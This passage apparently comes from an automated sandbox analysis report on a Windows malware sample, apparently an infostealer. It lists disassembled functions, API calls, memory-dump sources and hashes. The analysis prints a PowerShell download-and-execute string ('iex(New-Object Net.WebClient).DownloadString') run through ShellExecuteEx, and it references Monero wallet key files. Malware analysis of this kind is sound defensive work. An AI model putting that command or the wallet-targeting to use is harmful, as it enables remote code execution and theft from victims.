                                  • InternetOpenA.WININET(00250DDF,00000000,00000000,00000000,00000000), ref: 00234FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00235011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00235041
                                  • InternetCloseHandle.WININET(?), ref: 002350B9
                                  • InternetCloseHandle.WININET(?), ref: 002350C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 8ee3fad5e64781aea08a9cda999ed3ac672ab1b72fb187cbe4fd278eafbc9880
                                  • Instruction ID: 4f622288f90b90b0bf3133e1f46d4c556f031acfa01b9f267e75de08400db489
                                  • Opcode Fuzzy Hash: 8ee3fad5e64781aea08a9cda999ed3ac672ab1b72fb187cbe4fd278eafbc9880
                                  • Instruction Fuzzy Hash: 523119F4A50218ABDB24CF54DC85BDCB7B4EB48704F1081E8FA09A7280C7706ED58F99
                                  Function 00248100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0104F5F0,00000000,?,00250E2C,00000000,?,00000000), ref: 00248130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00248137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00248158
                                  • wsprintfA.USER32 ref: 002481AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: e7532b49e7b7dd7a12df311563974fa0b719db734c313a51d4db98707961dab8
                                  • Instruction ID: 2ce8da49b59f9ba2272e94a798acbb75735628effd5d0fe77a8b30b7b4f7bf55
                                  • Opcode Fuzzy Hash: e7532b49e7b7dd7a12df311563974fa0b719db734c313a51d4db98707961dab8
                                  • Instruction Fuzzy Hash: 44215EB1E54218ABDB04DFD4CC49FAFB7B8FB44B04F104519F609BB280D77869118BA9
                                  Function 002483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00248426
                                  • wsprintfA.USER32 ref: 00248459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0024847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00248499
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0104F638,00000000,000F003F,?,00000400), ref: 002484EC
                                  • lstrlen.KERNEL32(?), ref: 00248501
                                  • RegQueryValueExA.ADVAPI32(00000000,0104F758,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00250B34), ref: 00248599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00248608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 112295ddc6d018006f5d0ea104340bdacd309e6357178554ce2b7e3531785b2a
                                  • Instruction ID: d4320c4bc55b4e91d4bcad60c0ae03bbbfb2cdaaa5157f77a942f87008f44467
                                  • Opcode Fuzzy Hash: 112295ddc6d018006f5d0ea104340bdacd309e6357178554ce2b7e3531785b2a
                                  • Instruction Fuzzy Hash: CD210A71920218ABDB68DF54DC85FE9B3B8FB48704F00C1A8E609A6180DF71AA95CFD5
                                  Function 00247690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002476A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002476AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0103BC30,00000000,00020119,00000000), ref: 002476DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0104F668,00000000,00000000,?,000000FF), ref: 002476FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00247708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 55267b903e949bdf3ea21491bb8c5f91a9c3a8fc126a41fa58f04df92ab53d83
                                  • Instruction ID: da31dffd7e02f93d8108908b79e5f8f4a8e2408e7fc85945cb3ff71eb0c85c25
                                  • Opcode Fuzzy Hash: 55267b903e949bdf3ea21491bb8c5f91a9c3a8fc126a41fa58f04df92ab53d83
                                  • Instruction Fuzzy Hash: C4018FB4A00204BBD704EBE0DC49F6DB7B8EB88701F004064FA08A7291D77099648B56
                                  Function 00247720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0024773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0103BC30,00000000,00020119,002476B9), ref: 0024775B
                                  • RegQueryValueExA.ADVAPI32(002476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0024777A
                                  • RegCloseKey.ADVAPI32(002476B9), ref: 00247784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: e971d863640135467dbcee84200931cf6f94b66b6553d9a5ef8416610a08b2e5
                                  • Instruction ID: fd387e83c62e46d21767be5625a24b89c3109e3bbfabc7b4d8c013d0bf287056
                                  • Opcode Fuzzy Hash: e971d863640135467dbcee84200931cf6f94b66b6553d9a5ef8416610a08b2e5
                                  • Instruction Fuzzy Hash: 750167F5A50308BBD704EFE0DC49FAEB7B8EB44705F004554FA09A7281D77095548F56
                                  Function 002492E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(:$,80000000,00000003,00000000,00000003,00000080,00000000,?,00243AEE,?), ref: 002492FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:$), ref: 00249319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00249327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :$$:$
                                  • API String ID: 1378416451-2447859136
                                  • Opcode ID: 12a00023bcaa47e23a14e096ebd8a1750290c826a97ca1b1d66bede92c16ee43
                                  • Instruction ID: 391510f438b7f8ce165478414c1e883f645efdd2da51d8487fc5c6ca4f5c76a9
                                  • Opcode Fuzzy Hash: 12a00023bcaa47e23a14e096ebd8a1750290c826a97ca1b1d66bede92c16ee43
                                  • Instruction Fuzzy Hash: 64F0AF34E10208BBDB18DFB0DC09F9E7BB9AB88310F10C2A4B655A72C0D6B09A908F44
                                  Function 002399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                  • LocalFree.KERNEL32(0023148F), ref: 00239A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 981e6fbd2c9f05bd4abd36bb95355f5fc389ef9c8496dac83ce1967ee5a2782a
                                  • Instruction ID: 369554be2dd5586e90be156f8d08f6d0e3fe046b169ddde1980017be924e7795
                                  • Opcode Fuzzy Hash: 981e6fbd2c9f05bd4abd36bb95355f5fc389ef9c8496dac83ce1967ee5a2782a
                                  • Instruction Fuzzy Hash: 2D316DB4A1020AEFDB14DF94C985BAE77B5FF49300F108258E905A7290C774A9A1CFA1
                                  Function 00244780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0104F128), ref: 002447DB
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244801
                                  • lstrcat.KERNEL32(?,?), ref: 00244820
                                  • lstrcat.KERNEL32(?,?), ref: 00244834
                                  • lstrcat.KERNEL32(?,0103A478), ref: 00244847
                                  • lstrcat.KERNEL32(?,?), ref: 0024485B
                                  • lstrcat.KERNEL32(?,0104E608), ref: 0024486F
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 00248D90: GetFileAttributesA.KERNEL32(00000000,?,00231B54,?,?,0025564C,?,?,00250E1F), ref: 00248D9F
                                    • Part of subcall function 00244570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00244580
                                    • Part of subcall function 00244570: RtlAllocateHeap.NTDLL(00000000), ref: 00244587
                                    • Part of subcall function 00244570: wsprintfA.USER32 ref: 002445A6
                                    • Part of subcall function 00244570: FindFirstFileA.KERNEL32(?,?), ref: 002445BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: b4073e9037be3aef9f78353e7d3d0494f6cd958b709506e6b0ac0eafd4ba5ceb
                                  • Instruction ID: 4e377dc207627984a9d293925818b5c749f3f3f5fc7d3708c798ea9207986207
                                  • Opcode Fuzzy Hash: b4073e9037be3aef9f78353e7d3d0494f6cd958b709506e6b0ac0eafd4ba5ceb
                                  • Instruction Fuzzy Hash: 383195B2920218A7CB14FBB0DC85EED737CBB98700F404599B31996181EE7497D9CF96
                                  Function 00242C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00242D85
                                  Strings
                                  • <, xrefs: 00242D39
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00242D04
                                  • ')", xrefs: 00242CB3
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00242CC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 4f658b2e5817f664581763cca0039d721d7ab0eef66b4c73718dfeab0d0af059
                                  • Instruction ID: 20913c59f7e08ab2a977b2c3f3e4a37cd1b2b11f24d74c2c82bffebc4bd6eca0
                                  • Opcode Fuzzy Hash: 4f658b2e5817f664581763cca0039d721d7ab0eef66b4c73718dfeab0d0af059
                                  • Instruction Fuzzy Hash: C041DD71D602089AEB1CFFA0CC92BEDB774EF14304F504119F416A6192DF746A6ACF95
                                  Function 00239E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00239F41
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
